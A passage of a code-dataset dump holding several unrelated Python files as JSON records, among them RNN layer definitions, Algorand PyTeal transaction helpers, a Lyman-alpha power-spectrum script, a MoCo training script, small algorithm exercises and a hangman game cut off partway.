(linear_output, cost)\n\n#vanilla rnn layer\ndef rnn_layer(dim, h, n, x_mask, first, **kwargs):\n linear = Linear(input_dim=dim, output_dim=dim, name='linear' + str(n))\n rnn = SimpleRecurrent(dim=dim, activation=Rectifier(), name='rnn' + str(n))\n initialize([linear, rnn])\n applyLin=linear.apply(h)\n if first:\n rnnApply = rnn.apply(applyLin, mask=x_mask, **kwargs)\n else:\n rnnApply = rnn.apply(applyLin, **kwargs)\n\n return rnnApply\n\n#gru layer\ndef gru_layer(dim, h, n, x_mask, first, **kwargs):\n fork = Fork(output_names=['linear' + str(n), 'gates' + str(n)],\n name='fork' + str(n), input_dim=dim, output_dims=[dim, dim * 2])\n gru = GatedRecurrent(dim=dim, name='gru' + str(n))\n initialize([fork, gru])\n linear, gates = fork.apply(h)\n if first:\n gruApply = gru.apply(linear, gates, mask=x_mask, **kwargs)\n else:\n gruApply = gru.apply(linear, gates, **kwargs)\n return gruApply\n\n#lstm layer\ndef lstm_layer(dim, h, n, x_mask, first, **kwargs):\n linear = Linear(input_dim=dim, output_dim=dim * 4, name='linear' + str(n))\n lstm = LSTM(dim=dim, activation=Rectifier(), name='lstm' + str(n))\n initialize([linear, lstm])\n applyLin=linear.apply(h)\n\n if first:\n lstmApply = lstm.apply(applyLin, 
mask=x_mask, **kwargs)[0]\n else:\n lstmApply = lstm.apply(applyLin, **kwargs)[0]\n return lstmApply\n\n#puts all layers together\ndef nn_fprop(x, x_mask, y, y_mask, lens, vocab_size, hidden_size, num_layers, model, boosting=False, **kwargs):\n lookup = LookupTable(length=vocab_size, dim=hidden_size)\n initialize([lookup])\n h = lookup.apply(x)\n first=True\n for i in range(num_layers):\n if model == 'rnn':\n h = rnn_layer(hidden_size, h, i, x_mask=x_mask, first=first, **kwargs)\n elif model == 'gru':\n h = gru_layer(hidden_size, h, i, x_mask=x_mask, first=first, **kwargs)\n elif model == 'lstm':\n h = lstm_layer(hidden_size, h, i, x_mask=x_mask, first=first, **kwargs)\n else:\n print(\"models must either be rnn or lstm\")\n sys.exit(0)\n first=False\n\n return softmax_layer(h, y, x_mask, y_mask, lens, vocab_size, hidden_size, boosting)\n","repo_name":"moore269/RNNTrajectory","sub_path":"ModelDefinitions/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":4783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"39353512982","text":"from pyteal import *\n\n@Subroutine(TealType.none)\ndef inner_asset_opt_in(asset_id: TealType.uint64, asset_receiver: TealType.bytes) -> Expr:\n return Seq([\n InnerTxnBuilder.Begin(),\n InnerTxnBuilder.SetFields({\n #TxnField.note: Bytes(\"TUT_ITXN_AT\"),\n TxnField.type_enum: TxnType.AssetTransfer,\n TxnField.asset_amount: Int(0),\n TxnField.xfer_asset: asset_id,\n TxnField.asset_receiver: asset_receiver\n }),\n InnerTxnBuilder.Submit()\n ])\n\n@Subroutine(TealType.none)\ndef inner_asset_transfer_txn(\n asset_id: TealType.uint64,\n asset_amount: TealType.uint64,\n asset_receiver: TealType.bytes,\n close_to: TealType.bytes):\n return Seq([\n InnerTxnBuilder.Begin(),\n InnerTxnBuilder.SetFields({\n TxnField.type_enum: TxnType.AssetTransfer,\n TxnField.xfer_asset: asset_id,\n TxnField.asset_amount: asset_amount,\n TxnField.asset_receiver: asset_receiver,\n TxnField.asset_close_to: close_to\n }),\n InnerTxnBuilder.Submit()\n ])\n\n@Subroutine(TealType.none)\ndef inner_payment_txn(\n amount: TealType.uint64,\n receiver: TealType.bytes,\n close_to: TealType.bytes):\n return Seq([\n InnerTxnBuilder.Begin(),\n InnerTxnBuilder.SetFields({\n TxnField.type_enum: TxnType.Payment,\n TxnField.amount: amount,\n TxnField.receiver: receiver,\n TxnField.close_remainder_to: close_to\n }),\n InnerTxnBuilder.Submit()\n ])\n","repo_name":"platoprotocol/plato.algo.app.sdk","sub_path":"src/contracts/utils/inner_txn_utils.py","file_name":"inner_txn_utils.py","file_ext":"py","file_size_in_byte":1564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"73946381365","text":"# -- coding:utf-8 --\n\n\"\"\"\n 设置一个code最多可以玩MAX_COUNT次,每用一次,就把这个COUNT记录到COUNT_FILE_NAME里\n 每次检查,都先读取判断使用次数是否超出MAX_COUNT\n 如果在允许范围内,且code正确,则允许使用引擎\n\n 入口函数: check\n\n 测试说明:把MAX_COUNT设置为2, 运行3遍 python come_in.py 看看效果\n\"\"\"\n\nimport time\nimport base64\nimport os\n\nCOUNT_FILE_NAME = \"count.pyc\"\nMAX_COUNT = 50000\n\n\ndef check(team_name, team_leader_name, code):\n \"\"\"\n 检查team_name和code是否对应, code应该从微信公众号中查询获得\n :param: team_name: 队伍名称\n :param: team_leader_name: 队长名称\n :param: code: 从微信公众号获得的队伍编码\n :return: 如果编码和队伍名称匹配,返回True;否则返回False\n \"\"\"\n count, count_dict = get_count(COUNT_FILE_NAME, code)\n if count > MAX_COUNT:\n return False\n if encode(team_name, team_leader_name) != code:\n return False\n add_count(COUNT_FILE_NAME, code)\n return True\n\n\ndef 
file_to_dict(input_file_name):\n result_dict = {}\n if not os.path.exists(input_file_name):\n return result_dict\n with open(input_file_name, 'r', encoding='utf-8') as input_file:\n for line in input_file:\n line = line.strip()\n line_parts = line.split(\"\\t\")\n if len(line_parts) < 2:\n continue\n key, value = line_parts[0], int(line_parts[1])\n result_dict[key] = value\n return result_dict\n\n\ndef dict_to_file(input_dict, output_file_name):\n with open(output_file_name, 'w', encoding='utf-8') as output_file:\n for key, value in input_dict.items():\n output_file.write(\"{}\\t{}\".format(key, value))\n\n\ndef get_count(count_file_name, code):\n count_dict = file_to_dict(count_file_name)\n count = count_dict.setdefault(code, 1)\n return count, count_dict\n\n\ndef add_count(count_file_name, code):\n count, count_dict = get_count(count_file_name, code)\n count_dict[code] = count + 1\n dict_to_file(count_dict, count_file_name)\n\n\n# 用team_name和team_leader_name生成一个跟当天时间相关的验证码\ndef encode(team_name, team_leader_name):\n input = team_name + \":\" + time.strftime(\"%Y|%m|%d\", time.localtime()) + \":\" + team_leader_name\n code = base64.b64encode(input.encode('utf-8'))\n code = str(code, 'utf-8')\n return code[:6]\n\n\nif __name__ == \"__main__\":\n print(check('疯狂战队', '张三','uC5oiY'))\n","repo_name":"asfathermou/s3","sub_path":"come_in.py","file_name":"come_in.py","file_ext":"py","file_size_in_byte":2527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"16867897131","text":"__author__ = 'red'\nls = ['green', 'red']\ndef color(event):\n fr.configure(bg=ls[0])\n ls[0], ls[1] = ls[1], ls[0]\ndef out(event):\n root.destroy()\n\nfrom Tkinter import *\nroot = Tk()\n\nfr = Frame(root, width=200, height=100)\nbtn = Button(root, text=\"Press\")\n\nfr.pack()\nbtn.pack()\n\nfr.bind(\"\", color)\nbtn.bind(\"\", out)\n\nroot.mainloop()","repo_name":"red82/Graph","sub_path":"Events_1.py","file_name":"Events_1.py","file_ext":"py","file_size_in_byte":355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"19599729248","text":"import sys\ninput=sys.stdin.readline\n\nN=int(input())\nA=list(map(int,input().split()))\noperator=list(map(int,input().split()))\nmin_result=10**8\nmax_result=0\n\ndef result(x,y,operator):\n if operator == 0:\n return x+y\n if operator == 1:\n return x-y\n if operator == 2:\n return x*y\n else:\n if x<0:\n value=(-x)//y\n return -value\n else:\n return x//y\n\ndef dfs(idx,start):\n global min_result\n global max_result\n\n if idx==N-1:\n min_result=min(start,min_result)\n max_result=max(start,max_result)\n return\n \n # 연산자 체크\n for i in range(4):\n # 연산자가 없으면 다음으로\n if operator[i%4]==0:\n continue\n\n operator[i%4]-=1\n dfs(idx+1,result(start,A[idx+1],i%4))\n operator[i%4]+=1\n\ndfs(0,A[0])\n\nprint(max_result)\nprint(min_result)","repo_name":"bn-tw2020/2020_winter_algorithm","sub_path":"participants/SaeHyeon/Algorithms/back_tracking/BOJ14888.py","file_name":"BOJ14888.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"27769679031","text":"import unittest\n\n\"\"\"\nwrite down thoughts\nunder the assumptions explained in the problem statement, we know the expected total is n*(n+1)/2, and we can calculate \nthe total and then the difference is the missing number\n\"\"\"\nfrom typing import List\n\n\nclass Solution:\n def missingNumber(self, nums: List[int]) -> int:\n 
n = len(nums) # there is one number missing, but it started from 0, so n=len(nums)\n expected = n * (n + 1) // 2 # 1+2+...+n = n*(n+1)/2\n actual = sum(nums)\n return expected - actual\n\n\nclass TestSolution(unittest.TestCase):\n def test1(self):\n self.assertEqual(2, Solution().missingNumber([3, 0, 1]))\n def test2(self):\n self.assertEqual(2, Solution().missingNumber([0, 1]))\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"iseryanxie/leetcode","sub_path":"test_268_missing_num.py","file_name":"test_268_missing_num.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"28244254213","text":"import os\r\nimport sys\r\n\r\nimport h5py\r\nimport numpy as np\r\nimport matplotlib\r\nmatplotlib.use(\"Agg\")\r\nimport matplotlib.pyplot as plt\r\nfrom scipy.ndimage import gaussian_filter1d as gf\r\n\r\nfrom compute_power import compute_pk1d, compute_pk3d\r\nfrom tools import tau2deltaF\r\nfrom nbodykit.lab import cosmology\r\n\r\n# colors\r\ncolors = ['b', 'r', 'g', 'c', 'm', 'y', 'k']\r\n\r\ndef plot_skewer(tau, color, ls, label, skewer_id, Lbox=205.):\r\n if len(np.shape(tau)) == 2:\r\n tau = tau.reshape(int(np.sqrt(tau.shape[0])), int(np.sqrt(tau.shape[0])), tau.shape[1])\r\n bins = np.linspace(0., Lbox, tau.shape[2] + 1)\r\n binc = (bins[1:]+bins[:-1])*.5\r\n i = skewer_id\r\n j = i\r\n plt.plot(binc, tau[i, j, :], color=color, ls=ls, label=label)\r\n\r\n# information about simulation\r\nngrid = int(sys.argv[1]) #410 #205 #820\r\nLbox = 205. # cMpc/h\r\nfp_dm = 'fp'\r\nsnapshot = 29 # [2.58, 2.44, 2.32], [28, 29, 30]\r\n#res = sys.argv[2] # \"0.05\" \"0.25\" \"0.5\" \"1.0\"\r\nif ngrid == 820: res = \"0.25\"\r\nelif ngrid == 410: res = \"0.5\"\r\nelif ngrid == 205: res = \"1.0\"\r\nredshift = 2.44\r\npaste = sys.argv[2] #\"CIC\" # \"TSC\"\r\npaste_str = f\"_{paste}\" if paste == \"TSC\" else \"\"\r\n\r\n# Ly alpha skewers directory\r\nsave_dir = \"/n/holylfs05/LABS/hernquist_lab/Everyone/boryanah/LyA/\"\r\n\r\n# load deltaF\r\ndeltaF_file = os.path.join(save_dir, f'noiseless_maps/deltaF{paste_str}_ngrid_{ngrid:d}_snap_{snapshot:d}_{fp_dm}.npy')\r\ndeltaF = np.load(deltaF_file)\r\n\r\n# load tau (real)\r\ntau_file = os.path.join(save_dir, f'noiseless_maps/tau_real{paste_str}_ngrid_{ngrid:d}_snap_{snapshot:d}_{fp_dm}.npy')\r\ntau = np.load(tau_file)\r\nprint(\"mean, std of tau real = \", np.mean(tau), np.std(tau))\r\n\r\n# select one skewer and plot\r\nplt.figure(1, figsize=(11, 10))\r\nsum = 0\r\nplot_skewer(tau, color=colors[sum%len(colors)], ls='--', label='tau no RSD', skewer_id=150)\r\n\r\n# load tau (redshift)\r\ntau_file = os.path.join(save_dir, f'noiseless_maps/tau_redshift{paste_str}_ngrid_{ngrid:d}_snap_{snapshot:d}_{fp_dm}.npy')\r\ntau = np.load(tau_file)\r\nprint(\"mean, std of tau redshift = \", np.mean(tau), np.std(tau))\r\n\r\n# select one skewer and plot\r\nplot_skewer(tau, color=colors[sum%len(colors)], ls='-', label='tau w RSD', skewer_id=150)\r\nsum += 1\r\n\r\n# compute power spectrum\r\nk_hMpc, p1d_hMpc = compute_pk1d(deltaF, Lbox)\r\n\r\n# plot power spectrum\r\nplt.figure(2, figsize=(9, 7))\r\nplt.plot(k_hMpc, p1d_hMpc*k_hMpc/np.pi, label='FGPA')\r\nnp.savez(f\"power1d_fgpa{paste_str}_ngrid{ngrid:d}.npz\", p1d_hMpc=p1d_hMpc, k_hMpc=k_hMpc)\r\n\r\nn_k_bins = 20\r\nn_mu_bins = 16\r\nmu_want = [0., 0.33, 0.66, 1.]\r\n\r\nk_hMpc, mu, p3d_hMpc, counts = compute_pk3d(deltaF, Lbox, n_k_bins, n_mu_bins)\r\nprint(mu)\r\n\r\nno_nans = 0\r\nfor i in 
range(n_k_bins):\r\n if not np.any(np.isnan(mu[i])): no_nans = i\r\nint_mu = []\r\nfor i in range(len(mu_want)):\r\n int_mu.append(np.argmin(np.abs(mu_want[i] - mu[no_nans])))\r\nprint(k_hMpc[:, int_mu[3]])\r\nnp.savez(f\"power3d_fgpa{paste_str}_ngrid{ngrid:d}.npz\", p3d_hMpc=p3d_hMpc, k_hMpc=k_hMpc, mu=mu, counts=counts)\r\n\r\ncosmo = cosmology.Planck15\r\nP_L = cosmology.LinearPower(cosmo, redshift, transfer='EisensteinHu')\r\n\r\nplt.figure(3, figsize=(9, 7))\r\nplt.plot(k_hMpc[counts[:, int_mu[0]] > 0, int_mu[0]], (p3d_hMpc)[counts[:, int_mu[0]] > 0, int_mu[0]]/P_L.__call__(k_hMpc[counts[:, int_mu[0]] > 0, int_mu[0]]), color='violet')\r\nplt.plot(k_hMpc[counts[:, int_mu[1]] > 0, int_mu[1]], (p3d_hMpc)[counts[:, int_mu[1]] > 0, int_mu[1]]/P_L.__call__(k_hMpc[counts[:, int_mu[1]] > 0, int_mu[1]]), color='cyan')\r\nplt.plot(k_hMpc[counts[:, int_mu[2]] > 0, int_mu[2]], (p3d_hMpc)[counts[:, int_mu[2]] > 0, int_mu[2]]/P_L.__call__(k_hMpc[counts[:, int_mu[2]] > 0, int_mu[2]]), color='yellow')\r\nplt.plot(k_hMpc[counts[:, int_mu[3]] > 0, int_mu[3]], (p3d_hMpc)[counts[:, int_mu[3]] > 0, int_mu[3]]/P_L.__call__(k_hMpc[counts[:, int_mu[3]] > 0, int_mu[3]]), color='red')\r\n\r\nprint(\"k mu = 0 =\", k_hMpc[:, int_mu[0]])\r\nprint(\"k mu = 1 =\", k_hMpc[:, int_mu[3]])\r\nprint(\"cts mu = 0 =\", counts[:, int_mu[0]])\r\nprint(\"cts mu = 1 =\", counts[:, int_mu[3]])\r\nprint(\"p3d mu = 0 = \", (p3d_hMpc)[:, int_mu[0]])\r\nprint(\"p3d mu = 1 = \", (p3d_hMpc)[:, int_mu[3]])\r\n\r\n# load Ly alpha from Mahdi\r\nif res == \"1.0\":\r\n deltaF_file = os.path.join(save_dir, 'noiseless_maps/map_TNG_true_1.0_z2.4.hdf5')\r\n deltaF = h5py.File(deltaF_file,'r')['map'][:]\r\nelif res == \"0.5\":\r\n deltaF_file = os.path.join(save_dir, 'map_TNG_true_0.5_z2.4.hdf5')\r\n deltaF = h5py.File(deltaF_file,'r')['map'][:]\r\nelif res == \"0.25\":\r\n deltaF_file = os.path.join(save_dir, 'map_TNG_true_0.25_z2.5_820_voxels.hdf5')\r\n deltaF = h5py.File(deltaF_file,'r')['map'][:]\r\nelif res == \"0.05\":\r\n tau_file = os.path.join(save_dir,'spectra_z2.4/spectra_TNG_true_1.0_z2.4.hdf5')\r\n f = h5py.File(tau_file, 'r')\r\n tau = gf(f['tau/H/1/1215'][:], 1, mode='wrap')\r\n print(tau.shape)\r\n plt.figure(1)\r\n plot_skewer(tau, color=colors[sum%len(colors)], ls='-', label='tau high', skewer_id=150)\r\n plt.legend()\r\n #plt.xscale('log')\r\n #plt.yscale('log')\r\n plt.xlabel(\"r [Mpc/h]\")\r\n plt.ylabel(\"tau(r)\")\r\n plt.xlim([0., Lbox])\r\n #plt.ylim([np.sqrt(1.e-3), np.sqrt(.1)])\r\n plt.ylim([-0.5, 50.])\r\n plt.savefig(f\"tau_fgpa_rsd_high{paste_str}_ngrid{ngrid}.png\")\r\n print(\"mean, std of tau high = \", np.mean(tau), np.std(tau))\r\n redshift = f['Header'].attrs['redshift']\r\n deltaF = tau2deltaF(tau, redshift, mean_F=None)\r\n\r\n# compute power spectrum\r\nk_hMpc, p1d_hMpc = compute_pk1d(deltaF, Lbox)\r\n\r\n# plot power spectrum\r\nplt.figure(2)\r\nplt.plot(k_hMpc, p1d_hMpc*k_hMpc/np.pi, label='TNG')\r\nplt.legend()\r\nplt.xscale('log')\r\nplt.yscale('log')\r\nplt.xlabel(\"k [h/Mpc]\")\r\nplt.ylabel(\"k P(k)/pi\")\r\nplt.xlim([0.03, 20.])\r\nplt.ylim([1.e-3, .1])\r\nplt.savefig(f\"power_fgpa_rsd_high{paste_str}_ngrid{ngrid}.png\")\r\nplt.close()\r\nnp.savez(f\"power1d_tng_res{res}.npz\", p1d_hMpc=p1d_hMpc, k_hMpc=k_hMpc)\r\n\r\nk_hMpc, mu, p3d_hMpc, counts = compute_pk3d(deltaF, Lbox, n_k_bins, n_mu_bins)\r\nprint(mu)\r\n#mu.shape = 20, 16\r\n\r\nno_nans = 0\r\nfor i in range(n_k_bins):\r\n if not np.any(np.isnan(mu[i])): no_nans = i\r\nint_mu = []\r\nfor i in range(len(mu_want)):\r\n 
int_mu.append(np.argmin(np.abs(mu_want[i] - mu[no_nans])))\r\nnp.savez(f\"power3d_tng_res{res}.npz\", p3d_hMpc=p3d_hMpc, k_hMpc=k_hMpc, mu=mu, counts=counts)\r\n\r\nprint(\"k and mu = 1, p3D = \", k_hMpc[:, int_mu[3]], (p3d_hMpc)[:, int_mu[3]])\r\n\r\n\r\nplt.figure(3)\r\nplt.plot(k_hMpc[counts[:, int_mu[0]] > 0, int_mu[0]], (p3d_hMpc)[counts[:, int_mu[0]] > 0, int_mu[0]]/P_L.__call__(k_hMpc[counts[:, int_mu[0]] > 0, int_mu[0]]), color='violet', ls='--')\r\nplt.plot(k_hMpc[counts[:, int_mu[1]] > 0, int_mu[1]], (p3d_hMpc)[counts[:, int_mu[1]] > 0, int_mu[1]]/P_L.__call__(k_hMpc[counts[:, int_mu[1]] > 0, int_mu[1]]), color='cyan', ls='--')\r\nplt.plot(k_hMpc[counts[:, int_mu[2]] > 0, int_mu[2]], (p3d_hMpc)[counts[:, int_mu[2]] > 0, int_mu[2]]/P_L.__call__(k_hMpc[counts[:, int_mu[2]] > 0, int_mu[2]]), color='yellow', ls='--')\r\nplt.plot(k_hMpc[counts[:, int_mu[3]] > 0, int_mu[3]], (p3d_hMpc)[counts[:, int_mu[3]] > 0, int_mu[3]]/P_L.__call__(k_hMpc[counts[:, int_mu[3]] > 0, int_mu[3]]), color='red', ls='--')\r\nplt.plot([], [], ls='--', label='TNG')\r\nplt.plot([], [], ls='-', label='FGPA')\r\nplt.legend()\r\n#plt.ylim([0., 1.])\r\nplt.ylim([0., 0.3])\r\nplt.xlim([0.03, 20.])\r\nplt.xscale('log')\r\n#plt.yscale('log')\r\nplt.xlabel(\"k [h/Mpc]\")\r\nplt.ylabel(\"P(k)/P_L(k)\")\r\nplt.savefig(f\"power3d_fgpa_rsd_high{paste_str}_ngrid{ngrid}.png\")\r\nplt.close()\r\n","repo_name":"boryanah/abacus_tng_lyalpha","sub_path":"test_fgpa.py","file_name":"test_fgpa.py","file_ext":"py","file_size_in_byte":7397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"8260685301","text":"from sys import stdin\nfrom collections import defaultdict\ninput = stdin.readline\n\ndef dfs(s, c):\n if s == b:\n ans.append(c)\n return\n for i in dic[s]:\n if visit.get(i[1]):\n continue\n visit[i[1]] = True\n dfs(i[1], c + i[0])\n\n\nN, M = map(int, input().split())\ndic = defaultdict(list)\nans = []\n\nfor i in range(N-1):\n a, b, c = map(int, input().split())\n dic[a].append((c, b))\n dic[b].append((c, a))\n\nfor i in range(M):\n visit = dict()\n a, b = map(int, input().split())\n visit[a] = True\n dfs(a, 0)\nfor i in ans:\n print(i)","repo_name":"tagrn/BOJ_Study","sub_path":"211129/1240.py","file_name":"1240.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"71415090167","text":"from datetime import datetime\nfrom functools import partial\nfrom PIL import Image\nfrom torch.utils.data import DataLoader\nfrom torchvision import transforms\nfrom torchvision import datasets\nfrom torchvision.models import resnet\nfrom tqdm import tqdm\nimport argparse\nimport json\nimport math\nimport os\nimport pandas as pd\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport random\nfrom PIL import ImageFilter\n\n# original util library\nfrom mocotools import mocoutil\n\nparser = argparse.ArgumentParser(description='Train MoCo on JF cases')\n\nparser.add_argument('-a', '--arch', default='resnet18')\n\n# lr: 0.06 for batch 512 (or 0.03 for batch 256)\nparser.add_argument('--lr', '--learning-rate', default=0.0001, type=float, metavar='LR', \n help='initial learning rate', dest='lr')\nparser.add_argument('--epochs', default=200, type=int, metavar='N', \n help='number of total epochs to run')\nparser.add_argument('--schedule', default=[120, 160], nargs='*', type=int, \n help='learning rate schedule (when to drop lr by 10x); does not take effect if --cos is 
on')\nparser.add_argument('--cos', action='store_true', \n help='use cosine lr schedule')\n\nparser.add_argument('-b', '--batch-size', default=8, type=int, metavar='N', \n help='mini-batch size')\nparser.add_argument('--wd', default=5e-4, type=float, metavar='W', help='weight decay')\n\n# moco specific configs:\nparser.add_argument('--moco-dim', default=128, type=int, \n help='feature dimension')\nparser.add_argument('--moco-k', default=4096, type=int, \n help='queue size; number of negative keys') # original deafult 65536\nparser.add_argument('--moco-m', default=0.99, type=float, \n help='moco momentum of updating key encoder')\nparser.add_argument('--moco-t', default=0.1, type=float, \n help='softmax temperature')\n\nparser.add_argument('--bn-splits', default=8, type=int, \n help='simulate multi-gpu behavior of BatchNorm in one gpu; 1 is SyncBatchNorm in multi-gpu')\n\nparser.add_argument('--symmetric', action='store_true', \n help='use a symmetric loss function that backprops to both crops')\n\n# utils\nparser.add_argument('-d', '--data', default='', type=str, metavar='PATH',\n help='path to data folder')\nparser.add_argument('--resume', default='', type=str, metavar='PATH', \n help='path to latest checkpoint (default: none)')\nparser.add_argument('--results-dir', default='', type=str, metavar='PATH', \n help='path to cache (default: none)')\n\n\nargs = parser.parse_args() # running in command line\n\nif args.results_dir == '':\n args.results_dir = './cache-' + datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S-moco\")\n\n# these value need to be set for each dataset\nnormalize = transforms.Normalize(mean=[0.85, 0.7, 0.78],\n std=[0.15, 0.24, 0.2])\n\naugmentation = [\n transforms.RandomRotation(90), # rotate shoud be first\n transforms.CenterCrop(200),\n transforms.RandomApply([\n transforms.ColorJitter(brightness=0.07, # 0.4\n contrast=0.15, # 0.4\n saturation=0.6,\n hue=0.03) # not strengthened # 0.1\n ], p=1),# 0.8\n transforms.RandomHorizontalFlip(),\n transforms.RandomVerticalFlip(),\n transforms.ToTensor(),\n normalize\n]\n\ntrain_dataset = datasets.ImageFolder(args.data,\n mocoutil.TwoCropsTransform(transforms.Compose(augmentation)))\n\ntrain_loader = torch.utils.data.DataLoader(\n train_dataset, batch_size=args.batch_size, shuffle=True,\n num_workers=8, pin_memory=True, drop_last=True)\n\n# create model\nmodel = mocoutil.ModelMoCo(\n dim=args.moco_dim,\n K=args.moco_k,\n m=args.moco_m,\n T=args.moco_t,\n arch=args.arch,\n bn_splits=args.bn_splits,\n symmetric=args.symmetric,\n ).cuda()\n\n\n# train for one epoch\ndef train(net, data_loader, train_optimizer, epoch, args):\n net.train()\n adjust_learning_rate(optimizer, epoch, args)\n\n total_loss = 0.0\n total_num = 0\n train_bar = tqdm(data_loader)\n\n\n for tb in train_bar:\n images, _ = tb\n im_1, im_2 = images[0].cuda(non_blocking=True), images[1].cuda(non_blocking=True)\n\n loss = net(im_1, im_2)\n\n train_optimizer.zero_grad()\n loss.backward()\n train_optimizer.step()\n\n total_num += data_loader.batch_size\n total_loss += loss.item() * data_loader.batch_size\n train_bar.set_description('Train Epoch: [{}/{}], lr: {:.6f}, Loss: {:.4f}'.format(epoch, args.epochs, optimizer.param_groups[0]['lr'], total_loss / total_num))\n\n return total_loss / total_num\n\n# lr scheduler for training\ndef adjust_learning_rate(optimizer, epoch, args):\n \"\"\"Decay the learning rate based on schedule\"\"\"\n lr = args.lr\n if args.cos: # cosine lr schedule\n lr *= 0.5 * (1. 
+ math.cos(math.pi * epoch / args.epochs))\n else: # stepwise lr schedule\n for milestone in args.schedule:\n lr *= 0.1 if epoch >= milestone else 1.\n for param_group in optimizer.param_groups:\n param_group['lr'] = lr\n\n# define optimizer\n#optimizer = torch.optim.SGD(model.parameters(), lr=args.lr, weight_decay=args.wd, momentum=0.9)\noptimizer = torch.optim.Adam(model.parameters(), lr=args.lr)\n\n# load model if resume\nepoch_start = 1\nif args.resume is not '':\n checkpoint = torch.load(args.resume)\n model.load_state_dict(checkpoint['state_dict'])\n optimizer.load_state_dict(checkpoint['optimizer'])\n epoch_start = checkpoint['epoch'] + 1\n print('Loaded from: {}'.format(args.resume))\n\n# logging\nresults = {'train_loss': [], 'test_acc@1': []}\nif not os.path.exists(args.results_dir):\n os.mkdir(args.results_dir)\n# dump args\nwith open(args.results_dir + '/args.json', 'w') as fid:\n json.dump(args.__dict__, fid, indent=2)\n\n# training loop\nfor epoch in range(epoch_start, args.epochs + 1):\n train_loss = train(model, train_loader, optimizer, epoch, args)\n if (epoch == 1) | (epoch % 10 == 0): \n torch.save({'epoch': epoch, 'state_dict': model.state_dict(), 'optimizer' : optimizer.state_dict(),}, '{}/epoch{}.pth'.format(args.results_dir, str(epoch)))\n","repo_name":"uegamiw/MIXTURE","sub_path":"2_UIP_MoCo_1GPU.py","file_name":"2_UIP_MoCo_1GPU.py","file_ext":"py","file_size_in_byte":6343,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"73322362165","text":"import math\nimport logging\nimport sys\n\nlogger = logging.getLogger(__name__)\n\ndef rolling_hash(x,m):\n multiplier = 17\n tot = 0\n for c in x:\n tot = (tot * multiplier + ord(c) ) % m\n\n return tot\n\ndef fractional_hash(x, m):\n FRACTION = 0.61833\n return math.floor(((x * FRACTION) % 1) * m)\n\nclass num_hash_table:\n def __init__(self):\n self._arr = []\n self._hash = fractional_hash\n self._count = 0\n\n def _rehash(self):\n new_arr = [[] for _ in self._arr]\n for l in self._arr:\n for pair in l:\n k = self._hash(pair[0], len(new_arr))\n new_arr[k].append(pair)\n self._arr = new_arr\n\n def __setitem__(self, k, v):\n if self._count * 3 >= len(self._arr):\n self._arr = self._arr + [[] for x in range(1+ len(self._arr))]\n self._rehash()\n hashed = self._hash(k, len(self._arr))\n for i, pair in enumerate(self._arr[hashed]):\n if pair[0] == k:\n self._arr[hashed][i] = (k,v)\n else:\n self._arr[hashed].append((k,v))\n self._count += 1\n logger.debug('After putting k: %d, v: %d, arr is %s' % (k, v,self._arr))\n\n def __getitem__(self, k):\n for pair in self._arr[self._hash(k, len(self._arr))]:\n if pair[0] == k:\n return pair[1]\n raise KeyError(\"This key is not inside\")\n","repo_name":"yarnspinnered/algorithms","sub_path":"algorithms/my_hashes.py","file_name":"my_hashes.py","file_ext":"py","file_size_in_byte":1406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"27017463567","text":"import random, sys\n\nHANGMAN_PICS = [r\"\"\"\n +--+\n | |\n |\n |\n |\n |\n=====\"\"\",\nr\"\"\"\n +--+\n | |\n O |\n |\n |\n |\n=====\"\"\",\nr\"\"\"\n +--+\n | |\n O |\n | |\n |\n |\n=====\"\"\",\nr\"\"\"\n +--+\n | |\n O |\n/| |\n |\n |\n=====\"\"\",\nr\"\"\"\n +--+\n | |\n O |\n/|\\ |\n |\n |\n=====\"\"\",\nr\"\"\"\n +--+\n | |\n O |\n/|\\ |\n/ |\n |\n=====\"\"\",\nr\"\"\"\n +--+\n | |\n O |\n/|\\ |\n/ \\ |\n |\n=====\"\"\"]\n\nCATEGORY = 'Country'\nWORDS = 'SCOTLAND WALES DENMARK FINLAND NORWAY SWEDEN SWITZERLAND 
ESTONIA LATVIA AUSTRIA BELGIUM FRANCE GERMANY ITALY NETHERLANDS MEXICO CANADA UKRAINE RUSSIA GREECE SPAIN ROMANIA BULGARIA'.split()\n\ndef main():\n print('Hangman, by Al Sweigart al@inventwithpython.com')\n\n missedLetters = []\n correctLetters = []\n secretWord = random.choice(WORDS)\n\n while True:\n drawHangman(missedLetters, correctLetters, secretWord)\n guess = getPlayerGuess(missedLetters + correctLetters)\n\n if guess in secretWord:\n correctLetters.append(guess)\n foundAllLetters = True\n for secretWordLetter in secretWord:\n if secretWordLetter not in correctLetters:\n foundAllLetters = False\n break\n if foundAllLetters:\n print('Yes! The secret word is:', secretWord)\n print('You have won!')\n break\n else:\n missedLetters.append(guess)\n if len(missedLetters) == len(HANGMAN_PICS) - 1:\n drawHangman(missedLetters, correctLetters, secretWord)\n print('You have run out of guesses!')\n print('The word was \"{}\"'.format(secretWord))\n break\n\ndef drawHangman(missedLetters, correctLetters, secretWord):\n print(HANGMAN_PICS[len(missedLetters)])\n print('The category is:', CATEGORY)\n print()\n\n print('Пропущенные буквы: ', end='')\n for letter in missedLetters:\n print(letter, end=' ')\n if len(missedLetters) == 0:\n print('Пропущенных букв пока нет.')\n print()\n\n blanks = 